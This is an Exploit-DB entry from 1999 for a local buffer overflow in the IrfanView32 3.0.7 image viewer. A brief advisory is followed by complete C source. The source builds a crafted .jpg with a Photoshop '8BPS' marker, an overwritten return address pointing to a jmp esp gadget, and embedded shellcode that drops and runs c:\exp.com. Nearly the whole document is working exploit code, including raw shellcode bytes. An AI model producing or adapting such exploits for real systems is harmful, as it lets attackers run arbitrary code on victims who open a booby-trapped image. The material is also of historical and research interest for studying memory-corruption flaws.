IrfanView32 3.0.7 - Image File Buffer Overflow

EDB-ID:

19610


Author:

UNYUN

Type:

local


Platform:

Windows

Date:

1999-11-09


// source: https://www.securityfocus.com/bid/781/info

IrfanView32, a freeware image viewer, has a problem in the handling of Adobe Photoshop generated jpegs. If a .jpg file is opened for viewing that contains the Adobe Photoshop marker in the header (8BPS) followed by a long string, the program will crash. It is possible to insert code in the string for execution. 

/*=============================================================================
   Irfan View 3.07 Exploit
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by UNYUN (shadowpenguin@backsection.net)
  =============================================================================
*/

#include    <stdio.h>
#include    <string.h>
#include    <windows.h> 

#define     MAXBUF          0x22e0
#define     RETADR          0x31E
#define     FAKE_ADR        0x80101010  // Writable buffer pointer

#define     JMPESP_ADR      0xbffca4f7  // You have to change this value
                                        // for non-Japanese Windows98.
#define     HEAD            "8BPS\0"

unsigned char   exploit_code[300]={
 0xEB,0x4F,0x5F,0x32,0xC0,0x88,0x47,0x0A,0x88,0x47,0x10,0x88,0x47,0x17,0x88,0x47,
 0x1E,0x88,0x47,0x23,0x88,0x47,0x26,0x88,0x47,0x2D,0x88,0x47,0x3C,0x57,0xB8,0x50,
 0x77,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xDB,0xB3,0x0B,0x8B,0xC7,0x03,0xC3,0x50,
 0x56,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xC8,0x33,0xDB,0xB3,0x24,0x8B,0xC7,
 0x03,0xC3,0x50,0xB3,0x32,0x8B,0xC7,0x03,0xC3,0x50,0xFF,0xD1,0x89,0x47,0x2E,0xEB,
 0x02,0xEB,0x71,0x33,0xDB,0xB3,0x18,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,
 0xF7,0xBF,0xFF,0xD0,0x8B,0xC8,0x8B,0x47,0x2E,0x50,0x33,0xC0,0xB0,0x03,0x90,0x90,
 0x50,0xB0,0x01,0x50,0x33,0xDB,0xB3,0x3D,0x03,0xDF,0x53,0xFF,0xD1,0x33,0xDB,0xB3,
 0x11,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0x5F,
 0x2E,0x53,0xFF,0xD0,0x33,0xDB,0xB3,0x27,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,
 0x6E,0xF7,0xBF,0xFF,0xD0,0x33,0xDB,0xB3,0x32,0x8B,0xCF,0x03,0xCB,0x51,0xFF,0xD0,
 0x33,0xDB,0x53,0xB3,0x1F,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,0xF7,0xBF,
 0xFF,0xD0,0xFF,0xD0,0xE8,0x39,0xFF,0xFF,0xFF,0x00
};

// "exp.com"
unsigned char   exploit_data[1000]={
0xb0,0x13,0xcd,0x10,0xb0,0x0f,0xfe,0xc0,0xb4,0x0c,0xcd,0x10,0x03,0xd1,0x41,0x3c,
0x20,0x77,0xf1,0xeb,0xf1,0x00
};

int  GetProcAddress_fcp[4]={0x32,0x5e,0x88,0xbc};

char string_buffer[1000]  ="msvcrt.dll_fopen_fclose_fwrite_exit_wb_system_****";
char filename[100]        = "c:\\exp.com";

main(int argc,char *argv[])
{
    unsigned char   buf[MAXBUF],l1,l2;
    unsigned int    ip,p1,p2,i;
    FILE            *fp;
    
    if (argc<2){
        printf("usage : %s outputfile\n",argv[0]);
        exit(1);
    }
    memset(buf,0x90,MAXBUF); buf[MAXBUF]=0;
    memcpy(buf,HEAD,4);
    
    ip=JMPESP_ADR;
    buf[RETADR  ]=ip&0xff;
    buf[RETADR+1]=(ip>>8)&0xff;
    buf[RETADR+2]=(ip>>16)&0xff;
    buf[RETADR+3]=(ip>>24)&0xff;
    buf[RETADR+6]=0xeb;
    buf[RETADR+7]=0x04;

    ip=FAKE_ADR;
    buf[RETADR+8]=ip&0xff;
    buf[RETADR+9]=(ip>>8)&0xff;
    buf[RETADR+10]=(ip>>16)&0xff;
    buf[RETADR+11]=(ip>>24)&0xff;
    
    p1=(unsigned int)LoadLibrary;
    p2=(unsigned int)GetProcAddress;
    exploit_code[0x1f]=p1&0xff;
    exploit_code[0x20]=(p1>>8)&0xff;
    exploit_code[0x21]=(p1>>16)&0xff;
    exploit_code[0x22]=(p1>>24)&0xff;

    for (i=0;i<4;i++){
        exploit_code[GetProcAddress_fcp[i]  ]=p2&0xff;
        exploit_code[GetProcAddress_fcp[i]+1]=(p2>>8)&0xff;
        exploit_code[GetProcAddress_fcp[i]+2]=(p2>>16)&0xff;
        exploit_code[GetProcAddress_fcp[i]+3]=(p2>>24)&0xff;
    }

    l1=strlen(filename)+strlen(string_buffer);
    l2=strlen(exploit_data);
    strcat(string_buffer,filename );
    strcat(string_buffer,"_" );
    strcat(string_buffer,exploit_data );
    strcat(exploit_code, string_buffer );
    exploit_code[0x1c]  = l1;
    exploit_code[0x6d]  = l2;
    exploit_code[0x77]  = l1+1;

    memcpy(buf+RETADR+12,exploit_code,strlen(exploit_code));

    if ((fp=fopen(argv[1],"wb"))==NULL){
        printf("Can not write file '%s'\n",argv[1]);
        exit(1);
    }
    
    fwrite(buf,1,MAXBUF,fp);
    fclose(fp);
    printf("Done.\n");
    return FALSE;
}